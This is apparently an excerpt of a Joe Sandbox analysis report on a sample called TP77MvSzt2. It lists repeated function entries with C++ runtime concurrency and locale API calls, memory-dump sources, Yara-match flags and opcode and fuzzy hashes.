                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4211450280.0000000004830000.00000040.00001000.00020000.00000000.sdmp, Offset: 04830000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4830000_TP77MvSzt2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Concurrency::details::$Virtual$Node::ProcessorSchedulingWork$FindItemItem::MarkNextProcessor::Service
                                                                                  • String ID:
                                                                                  • API String ID: 78362717-0
                                                                                  • Opcode ID: c8ef6192b05c3357363908c599ceeaf6275af44595a57e37f7ac34529dc1d332
                                                                                  • Instruction ID: afb5d691578a3ba950c5dde80ee21f918227d36162581b065f686ba5840941f4
                                                                                  • Opcode Fuzzy Hash: c8ef6192b05c3357363908c599ceeaf6275af44595a57e37f7ac34529dc1d332
                                                                                  • Instruction Fuzzy Hash: 47012632700124A7DF11EE5CC800AEF77A9AF80364F000A11EC19FB2A1EAB0FD0182E1
                                                                                  APIs
                                                                                  • Concurrency::location::_Assign.LIBCMT ref: 04852BD1
                                                                                  • Concurrency::details::SchedulerBase::GetBitSet.LIBCONCRT ref: 04852BEF
                                                                                    • Part of subcall function 048486A7: Concurrency::details::QuickBitSet::QuickBitSet.LIBCMT ref: 048486C8
                                                                                    • Part of subcall function 048486A7: Hash.LIBCMT ref: 04848708
                                                                                  • Concurrency::details::QuickBitSet::operator=.LIBCMT ref: 04852BF8
                                                                                  • Concurrency::details::SchedulerBase::GetResourceMaskId.LIBCONCRT ref: 04852C18
                                                                                    • Part of subcall function 0484F6FF: Hash.LIBCMT ref: 0484F711
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4211450280.0000000004830000.00000040.00001000.00020000.00000000.sdmp, Offset: 04830000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4830000_TP77MvSzt2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Concurrency::details::$Quick$Base::HashScheduler$AssignConcurrency::location::_MaskResourceSet::Set::operator=
                                                                                  • String ID:
                                                                                  • API String ID: 2250070497-0
                                                                                  • Opcode ID: d379dd8d035abd09aa72343d0417816ebca02f1086c5fe86f80796eb41e1f0bb
                                                                                  • Instruction ID: 9683f083a2e82c3f1d2aee287f37318397ebf510cbc723480a881ebc33df6b0c
                                                                                  • Opcode Fuzzy Hash: d379dd8d035abd09aa72343d0417816ebca02f1086c5fe86f80796eb41e1f0bb
                                                                                  • Instruction Fuzzy Hash: 6D118E76400604AFD715DFA8C8809CAF7B8AF59310F044A5EEA56C7161DBB0F904CBA1
                                                                                  APIs
                                                                                  • Concurrency::location::_Assign.LIBCMT ref: 04852BD1
                                                                                  • Concurrency::details::SchedulerBase::GetBitSet.LIBCONCRT ref: 04852BEF
                                                                                    • Part of subcall function 048486A7: Concurrency::details::QuickBitSet::QuickBitSet.LIBCMT ref: 048486C8
                                                                                    • Part of subcall function 048486A7: Hash.LIBCMT ref: 04848708
                                                                                  • Concurrency::details::QuickBitSet::operator=.LIBCMT ref: 04852BF8
                                                                                  • Concurrency::details::SchedulerBase::GetResourceMaskId.LIBCONCRT ref: 04852C18
                                                                                    • Part of subcall function 0484F6FF: Hash.LIBCMT ref: 0484F711
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4211450280.0000000004830000.00000040.00001000.00020000.00000000.sdmp, Offset: 04830000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4830000_TP77MvSzt2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Concurrency::details::$Quick$Base::HashScheduler$AssignConcurrency::location::_MaskResourceSet::Set::operator=
                                                                                  • String ID:
                                                                                  • API String ID: 2250070497-0
                                                                                  • Opcode ID: 36e6617bf236213b9ae2a6ec488584fbad12b714714c281d1e824cb46c32bc20
                                                                                  • Instruction ID: f72b83e06f820932450d064abfd167fe2a4929a330f8eb5833dffc00e6281aa6
                                                                                  • Opcode Fuzzy Hash: 36e6617bf236213b9ae2a6ec488584fbad12b714714c281d1e824cb46c32bc20
                                                                                  • Instruction Fuzzy Hash: D4011776500604ABD715EFA9C881DDAF7E8AF59314F008A1EEA56C7150DBB0F9448BA1
                                                                                  APIs
                                                                                  • __EH_prolog3_GS.LIBCMT ref: 0040594B
                                                                                    • Part of subcall function 0040BB6C: __EH_prolog3_GS.LIBCMT ref: 0040BB73
                                                                                  • std::_Locinfo::_Locinfo.LIBCPMT ref: 00405996
                                                                                  • __Getcoll.LIBCPMT ref: 004059A5
                                                                                  • std::_Locinfo::~_Locinfo.LIBCPMT ref: 004059B5
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4209128462.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_TP77MvSzt2.jbxd
                                                                                  Similarity
                                                                                  • API ID: H_prolog3_Locinfostd::_$GetcollLocinfo::_Locinfo::~_
                                                                                  • String ID:
                                                                                  • API String ID: 1836011271-0
                                                                                  • Opcode ID: d3fd66d427a518a8327b3cb9cb74f6b8f9439b9a56478c2bf79d900e2c088ded
                                                                                  • Instruction ID: 9fd44fd2a3ed9f30d206a08b807669c32d498cc680062da3e3aec36702d876a7
                                                                                  • Opcode Fuzzy Hash: d3fd66d427a518a8327b3cb9cb74f6b8f9439b9a56478c2bf79d900e2c088ded
                                                                                  • Instruction Fuzzy Hash: 710135B1920209DFDB10EFA5C48279DBBB0FF00314F00813EE445AB281DB789984CF99
                                                                                  APIs
                                                                                  • __EH_prolog3_GS.LIBCMT ref: 00404E8F
                                                                                    • Part of subcall function 0040BB6C: __EH_prolog3_GS.LIBCMT ref: 0040BB73
                                                                                  • std::_Locinfo::_Locinfo.LIBCPMT ref: 00404EDA
                                                                                  • __Getcoll.LIBCPMT ref: 00404EE9
                                                                                  • std::_Locinfo::~_Locinfo.LIBCPMT ref: 00404EF9
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4209128462.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_TP77MvSzt2.jbxd
                                                                                  Similarity
                                                                                  • API ID: H_prolog3_Locinfostd::_$GetcollLocinfo::_Locinfo::~_
                                                                                  • String ID:
                                                                                  • API String ID: 1836011271-0
                                                                                  • Opcode ID: 5c7f7b3e267c3cd93c70c270880bc3968e993bb5a96bedaf9e5824c89bd4bda4
                                                                                  • Instruction ID: 32d9f0e851cf819fcbf451bbe4f834ae4b9dc531d1d0ebefa622e2c81c742f75
                                                                                  • Opcode Fuzzy Hash: 5c7f7b3e267c3cd93c70c270880bc3968e993bb5a96bedaf9e5824c89bd4bda4
                                                                                  • Instruction Fuzzy Hash: 9F015771910209DFEB10EFA5C48179DB7B0BF80314F00813EE445AB281DB789984CB99
                                                                                  APIs
                                                                                  • __EH_prolog3_GS.LIBCMT ref: 048350F6
                                                                                    • Part of subcall function 0483BDD3: __EH_prolog3_GS.LIBCMT ref: 0483BDDA
                                                                                  • std::_Locinfo::_Locinfo.LIBCPMT ref: 04835141
                                                                                  • __Getcoll.LIBCPMT ref: 04835150
                                                                                  • std::_Locinfo::~_Locinfo.LIBCPMT ref: 04835160
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4211450280.0000000004830000.00000040.00001000.00020000.00000000.sdmp, Offset: 04830000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4830000_TP77MvSzt2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: H_prolog3_Locinfostd::_$GetcollLocinfo::_Locinfo::~_
                                                                                  • String ID:
                                                                                  • API String ID: 1836011271-0
                                                                                  • Opcode ID: c834db4ee7f75f742bc9d38e4f24115f4df888d21d984597e93f0d8c665dfe3d
                                                                                  • Instruction ID: 449efb01455fda9885334cb508a1624ba3145b834d1af700cfbc3ce3eee18b35
                                                                                  • Opcode Fuzzy Hash: c834db4ee7f75f742bc9d38e4f24115f4df888d21d984597e93f0d8c665dfe3d
                                                                                  • Instruction Fuzzy Hash: 8A014071D10208EFEB00EFA8C440B9DB7B0BF4431AF108A19D555EB241D7B8B944CB92
                                                                                  APIs
                                                                                  • __EH_prolog3_GS.LIBCMT ref: 04835BB2
                                                                                    • Part of subcall function 0483BDD3: __EH_prolog3_GS.LIBCMT ref: 0483BDDA
                                                                                  • std::_Locinfo::_Locinfo.LIBCPMT ref: 04835BFD
                                                                                  • __Getcoll.LIBCPMT ref: 04835C0C
                                                                                  • std::_Locinfo::~_Locinfo.LIBCPMT ref: 04835C1C
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4211450280.0000000004830000.00000040.00001000.00020000.00000000.sdmp, Offset: 04830000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4830000_TP77MvSzt2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: H_prolog3_Locinfostd::_$GetcollLocinfo::_Locinfo::~_
                                                                                  • String ID:
                                                                                  • API String ID: 1836011271-0
                                                                                  • Opcode ID: 4b78d09c282b1f3f12f082a40fd3b66a20315af271f9a4a9c9543dffe2d9a537
                                                                                  • Instruction ID: eda929c4aeb33b2a598abcc8968f0302d72b0112b1e476b52962a4a7f7b6a11b
                                                                                  • Opcode Fuzzy Hash: 4b78d09c282b1f3f12f082a40fd3b66a20315af271f9a4a9c9543dffe2d9a537
                                                                                  • Instruction Fuzzy Hash: C7014071910208EFEB00EFA8C44079DB7B0BF4431AF108E19D145EB241C7B4B544CBD2
                                                                                  APIs
                                                                                  • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0041BF29
                                                                                  • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0041BF39
                                                                                  • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0041BF49
                                                                                  • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0041BF5D
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4209128462.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_TP77MvSzt2.jbxd
                                                                                  Similarity
                                                                                  • API ID: Compare_exchange_acquire_4std::_
                                                                                  • String ID:
                                                                                  • API String ID: 3973403980-0
                                                                                  • Opcode ID: 3b89475e2bdafd6ed96e14fd4d006d48e41723d7c24de3c610b0d4f4f0c7b455
                                                                                  • Instruction ID: 72732f5efe9b63b971529a3f0cd962c81f2cd17cb7f3a1b82d9d198b59e5c030
                                                                                  • Opcode Fuzzy Hash: 3b89475e2bdafd6ed96e14fd4d006d48e41723d7c24de3c610b0d4f4f0c7b455
                                                                                  • Instruction Fuzzy Hash: FB01F63608414DBBCF129E64DC428EE3B26EB08354B148416FD18C4232C336CAB2AF8E
                                                                                  APIs
                                                                                  • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0484C190
                                                                                  • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0484C1A0
                                                                                  • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0484C1B0
                                                                                  • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0484C1C4
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4211450280.0000000004830000.00000040.00001000.00020000.00000000.sdmp, Offset: 04830000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4830000_TP77MvSzt2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Compare_exchange_acquire_4std::_
                                                                                  • String ID:
                                                                                  • API String ID: 3973403980-0
                                                                                  • Opcode ID: 3b89475e2bdafd6ed96e14fd4d006d48e41723d7c24de3c610b0d4f4f0c7b455
                                                                                  • Instruction ID: 748a34315a2e90c0bc53696241266f29aa3be2b154b4fe798a76a50b5b414a96
                                                                                  • Opcode Fuzzy Hash: 3b89475e2bdafd6ed96e14fd4d006d48e41723d7c24de3c610b0d4f4f0c7b455
                                                                                  • Instruction Fuzzy Hash: D901313B00611DBBDF119F58DD008AD3F2EBF95258F158A12FA18C4034E332E270AB86
                                                                                  APIs
                                                                                  • Concurrency::details::LockQueueNode::LockQueueNode.LIBCONCRT ref: 004110FB
                                                                                    • Part of subcall function 0041096D: Concurrency::details::SchedulerBase::CurrentContext.LIBCMT ref: 0041098F
                                                                                    • Part of subcall function 0041096D: Concurrency::details::RegisterAsyncTimerAndLoadLibrary.LIBCONCRT ref: 004109B0
                                                                                  • Concurrency::critical_section::_Acquire_lock.LIBCONCRT ref: 0041110E
                                                                                  • Concurrency::critical_section::_Switch_to_active.LIBCMT ref: 0041111A
                                                                                  • Concurrency::details::LockQueueNode::DerefTimerNode.LIBCONCRT ref: 00411123
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4209128462.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_TP77MvSzt2.jbxd
                                                                                  Similarity
                                                                                  • API ID: Concurrency::details::$LockQueue$Concurrency::critical_section::_NodeNode::Timer$Acquire_lockAsyncBase::ContextCurrentDerefLibraryLoadRegisterSchedulerSwitch_to_active
                                                                                  • String ID:
                                                                                  • API String ID: 4284812201-0
                                                                                  • Opcode ID: 579a0525b44f01270be9ef68fc27b73e08c7f2f833de457b821bb81fd48d1548
                                                                                  • Instruction ID: 32ef31896b2cb6abdcbb34161c10e74fd4bf83775755d0cce9f66a209d269357
                                                                                  • Opcode Fuzzy Hash: 579a0525b44f01270be9ef68fc27b73e08c7f2f833de457b821bb81fd48d1548
                                                                                  • Instruction Fuzzy Hash: 5EF02470A8020467DF24BBA648525EE72954F84328F14003FB7126B7D2CEBC4DC2929C
                                                                                  APIs
                                                                                  • Concurrency::details::LoadLibraryAndCreateThread.LIBCONCRT ref: 00413545
                                                                                    • Part of subcall function 004128CF: ___crtGetTimeFormatEx.LIBCMT ref: 004128E5
                                                                                    • Part of subcall function 004128CF: Concurrency::details::ReferenceLoadLibrary.LIBCONCRT ref: 00412904
                                                                                  • GetLastError.KERNEL32 ref: 00413561
                                                                                  • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00413577
                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00413585
                                                                                    • Part of subcall function 004126A5: SetThreadPriority.KERNEL32(?,?), ref: 004126B1
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4209128462.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_TP77MvSzt2.jbxd
                                                                                  Similarity
                                                                                  • API ID: Concurrency::details::LibraryLoadThread$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorCreateErrorException@8FormatLastPriorityReferenceThrowTime___crt
                                                                                  • String ID:
                                                                                  • API String ID: 1674182817-0
                                                                                  • Opcode ID: 93dc6e6853861ab66bbf85d3994f28224c3287503f93e908fd108eb425b3b23d
                                                                                  • Instruction ID: d4d0e34155d1b65ea1fa919a817b0ae51ac78690af07c02d22dcd9fb344bc12c
                                                                                  • Opcode Fuzzy Hash: 93dc6e6853861ab66bbf85d3994f28224c3287503f93e908fd108eb425b3b23d
                                                                                  • Instruction Fuzzy Hash: 80F0E2B1A002193AE720BA765D07FFB369C9B00B90F90081BB905E6082EDDCD95042BC
                                                                                  APIs
                                                                                  • Concurrency::details::LockQueueNode::LockQueueNode.LIBCONCRT ref: 04841362
                                                                                    • Part of subcall function 04840BD4: Concurrency::details::SchedulerBase::CurrentContext.LIBCMT ref: 04840BF6
                                                                                    • Part of subcall function 04840BD4: Concurrency::details::RegisterAsyncTimerAndLoadLibrary.LIBCONCRT ref: 04840C17
                                                                                  • Concurrency::critical_section::_Acquire_lock.LIBCONCRT ref: 04841375
                                                                                  • Concurrency::critical_section::_Switch_to_active.LIBCMT ref: 04841381
                                                                                  • Concurrency::details::LockQueueNode::DerefTimerNode.LIBCONCRT ref: 0484138A
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4211450280.0000000004830000.00000040.00001000.00020000.00000000.sdmp, Offset: 04830000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4830000_TP77MvSzt2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Concurrency::details::$LockQueue$Concurrency::critical_section::_NodeNode::Timer$Acquire_lockAsyncBase::ContextCurrentDerefLibraryLoadRegisterSchedulerSwitch_to_active
                                                                                  • String ID:
                                                                                  • API String ID: 4284812201-0
                                                                                  • Opcode ID: 7cc60c53a006b7c0a8f5f6fa39395797a6efdddb6a6f80acb77e5e57232fdb4f
                                                                                  • Instruction ID: 502b4c51e0bdcb01db52b8bb4ae3f57a633da8b35addce99d64e6b7d8ac0843f
                                                                                  • Opcode Fuzzy Hash: 7cc60c53a006b7c0a8f5f6fa39395797a6efdddb6a6f80acb77e5e57232fdb4f
                                                                                  • Instruction Fuzzy Hash: C3F0243078060C67AF24BAAC081C5AF62965FD2318B040B79DB51EB3C0DEB87D4493DA
                                                                                  APIs
                                                                                  • Concurrency::details::LoadLibraryAndCreateThread.LIBCONCRT ref: 048437AC
                                                                                    • Part of subcall function 04842B36: ___crtGetTimeFormatEx.LIBCMT ref: 04842B4C
                                                                                    • Part of subcall function 04842B36: Concurrency::details::ReferenceLoadLibrary.LIBCONCRT ref: 04842B6B
                                                                                  • GetLastError.KERNEL32 ref: 048437C8
                                                                                  • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 048437DE
                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 048437EC
                                                                                    • Part of subcall function 0484290C: SetThreadPriority.KERNEL32(?,?), ref: 04842918
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4211450280.0000000004830000.00000040.00001000.00020000.00000000.sdmp, Offset: 04830000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4830000_TP77MvSzt2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Concurrency::details::LibraryLoadThread$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorCreateErrorException@8FormatLastPriorityReferenceThrowTime___crt
                                                                                  • String ID:
                                                                                  • API String ID: 1674182817-0
                                                                                  • Opcode ID: 93dc6e6853861ab66bbf85d3994f28224c3287503f93e908fd108eb425b3b23d
                                                                                  • Instruction ID: 5c9133b180e3eac28bd7ec19801afc41ae49ee48b1dfb1af1212904c576bc6bb
                                                                                  • Opcode Fuzzy Hash: 93dc6e6853861ab66bbf85d3994f28224c3287503f93e908fd108eb425b3b23d
                                                                                  • Instruction Fuzzy Hash: 91F027B2A0031D39F320B7794C06FBB369C9B40794F500E6BB944E20C0EDD8F40082B9
                                                                                  APIs
                                                                                  • Concurrency::details::SchedulerProxy::GetCurrentThreadExecutionResource.LIBCMT ref: 0484D0A8
                                                                                  • Concurrency::details::ResourceManager::RemoveExecutionResource.LIBCONCRT ref: 0484D0CC
                                                                                  • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0484D0DF
                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 0484D0ED
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4211450280.0000000004830000.00000040.00001000.00020000.00000000.sdmp, Offset: 04830000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4830000_TP77MvSzt2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Resource$Concurrency::details::Execution$CurrentException@8Manager::Proxy::RemoveSchedulerThreadThrowstd::invalid_argument::invalid_argument
                                                                                  • String ID:
                                                                                  • API String ID: 3657713681-0
                                                                                  • Opcode ID: 9390b3195b713983fe10ad4c3c6d405898b6246382bfd66b9966ffe9dd40d037
                                                                                  • Instruction ID: d50d4340bfb23063ebddd877d96e7dd736689bfd5c06959d1b52e914fcdf30c4
                                                                                  • Opcode Fuzzy Hash: 9390b3195b713983fe10ad4c3c6d405898b6246382bfd66b9966ffe9dd40d037
                                                                                  • Instruction Fuzzy Hash: 10F0B43560010C678724FA59E851C6DB3BA9ED1B197208F1A990693291EAB5B90AC692
                                                                                  APIs
                                                                                  • RegisterWaitForSingleObject.KERNEL32(?,00000000,004235B2,000000A4,000000FF,0000000C), ref: 00412628
                                                                                  • GetLastError.KERNEL32(?,?,?,?,004185E9,?,?,?,?,00000000,?,00000000), ref: 00412637
                                                                                  • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 0041264D
                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 0041265B
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4209128462.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_TP77MvSzt2.jbxd
                                                                                  Similarity
                                                                                  • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastObjectRegisterSingleThrowWait
                                                                                  • String ID:
                                                                                  • API String ID: 3803302727-0
                                                                                  • Opcode ID: e4f9fab13c1926d2e81b23feee93bab4e40d19f09818ad509d0e3559ff61ead6
                                                                                  • Instruction ID: 0dfe4b91b17fca29e91fbe1ee06f4a4a2df34707d6a261af2a3e5670f24271a8
                                                                                  • Opcode Fuzzy Hash: e4f9fab13c1926d2e81b23feee93bab4e40d19f09818ad509d0e3559ff61ead6
                                                                                  • Instruction Fuzzy Hash: 34F0A07460010EBBCF10EFA5DE45EEF37686B00705F600656B514E20E1DA78DA149768
                                                                                  APIs
                                                                                  • RegisterWaitForSingleObject.KERNEL32(?,00000000,004235B2,000000A4,000000FF,0000000C), ref: 0484288F
                                                                                  • GetLastError.KERNEL32(?,?,?,?,04848850,?,?,?,?,00000000,?,00000000), ref: 0484289E
                                                                                  • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 048428B4
                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 048428C2
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4211450280.0000000004830000.00000040.00001000.00020000.00000000.sdmp, Offset: 04830000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4830000_TP77MvSzt2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastObjectRegisterSingleThrowWait
                                                                                  • String ID:
                                                                                  • API String ID: 3803302727-0
                                                                                  • Opcode ID: e4f9fab13c1926d2e81b23feee93bab4e40d19f09818ad509d0e3559ff61ead6
                                                                                  • Instruction ID: 3f059d16a1064d004a12001d7568d20de75786a2b08ecf6189f049774a66dfff
                                                                                  • Opcode Fuzzy Hash: e4f9fab13c1926d2e81b23feee93bab4e40d19f09818ad509d0e3559ff61ead6
                                                                                  • Instruction Fuzzy Hash: B4F0A03490020EBBDF00FFA4CD44EAF3B68AB00655F200B55B614E20A0DA74E604A7A5
                                                                                  APIs
                                                                                  • std::_Cnd_initX.LIBCPMT ref: 04835AA8
                                                                                  • __Cnd_signal.LIBCPMT ref: 04835AB4
                                                                                  • std::_Cnd_initX.LIBCPMT ref: 04835AC9
                                                                                  • __Cnd_do_broadcast_at_thread_exit.LIBCPMT ref: 04835AD0
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4211450280.0000000004830000.00000040.00001000.00020000.00000000.sdmp, Offset: 04830000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4830000_TP77MvSzt2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Cnd_initstd::_$Cnd_do_broadcast_at_thread_exitCnd_signal
                                                                                  • String ID:
                                                                                  • API String ID: 2059591211-0
                                                                                  • Opcode ID: 16e91ae191353f76377487b504f8ad98fae09f0c97f906459e9bfe3258fa4ce0
                                                                                  • Instruction ID: 3430433b64a768c38476c880cbe777a0f089e73125d34547465710dfcf7433cf
                                                                                  • Opcode Fuzzy Hash: 16e91ae191353f76377487b504f8ad98fae09f0c97f906459e9bfe3258fa4ce0
                                                                                  • Instruction Fuzzy Hash: 1CF08C72400701ABFB317B28C81975A73A0AF4072EF144E19D596DA9A0CFFAB8459AD3
                                                                                  APIs
                                                                                  • ___crtCreateEventExW.LIBCPMT ref: 0041234C
                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,00410B59), ref: 0041235A
                                                                                  • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00412370
                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 0041237E
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4209128462.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_TP77MvSzt2.jbxd
                                                                                  Similarity
                                                                                  • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorCreateErrorEventException@8LastThrow___crt
                                                                                  • String ID:
                                                                                  • API String ID: 200240550-0
                                                                                  • Opcode ID: 8f1a4222a24bf13f64463e6bb6d09cdc0fcbd04c53ea7d81c6ce3fbd118b929d
                                                                                  • Instruction ID: f5537a877189a90aa28975f9b1b11099a3717870695f97e2c6136de35ce4b3b1
                                                                                  • Opcode Fuzzy Hash: 8f1a4222a24bf13f64463e6bb6d09cdc0fcbd04c53ea7d81c6ce3fbd118b929d
                                                                                  • Instruction Fuzzy Hash: ADE0D871A0021E29E720B7768D07FBF369C6B00B45F54086BBD14E11C3FDACD61041AC
                                                                                  APIs
                                                                                  • ___crtCreateEventExW.LIBCPMT ref: 048425B3
                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,04840DC0), ref: 048425C1
                                                                                  • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 048425D7
                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 048425E5
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4211450280.0000000004830000.00000040.00001000.00020000.00000000.sdmp, Offset: 04830000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4830000_TP77MvSzt2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorCreateErrorEventException@8LastThrow___crt
                                                                                  • String ID:
                                                                                  • API String ID: 200240550-0
                                                                                  APIs
                                                                                    • Part of subcall function 00412712: TlsAlloc.KERNEL32(?,00410B59), ref: 00412718
                                                                                  • TlsAlloc.KERNEL32(?,00410B59), ref: 0042399F
                                                                                  • GetLastError.KERNEL32 ref: 004239B1
                                                                                  • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 004239C7
                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 004239D5
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4209128462.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_TP77MvSzt2.jbxd
                                                                                  Similarity
                                                                                  • API ID: Alloc$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrow
                                                                                  • String ID:
                                                                                  • API String ID: 3735082963-0
                                                                                  APIs
                                                                                    • Part of subcall function 04842979: TlsAlloc.KERNEL32(?,04840DC0), ref: 0484297F
                                                                                  • TlsAlloc.KERNEL32(?,04840DC0), ref: 04853C06
                                                                                  • GetLastError.KERNEL32 ref: 04853C18
                                                                                  • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 04853C2E
                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 04853C3C
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4211450280.0000000004830000.00000040.00001000.00020000.00000000.sdmp, Offset: 04830000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4830000_TP77MvSzt2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Alloc$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrow
                                                                                  • String ID:
                                                                                  • API String ID: 3735082963-0
                                                                                  APIs
                                                                                  • GetNumaHighestNodeNumber.KERNEL32(?,00000000,?,00410B59,?,?,?,00000000), ref: 00412557
                                                                                  • GetLastError.KERNEL32(?,?,?,00000000), ref: 00412566
                                                                                  • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 0041257C
                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 0041258A
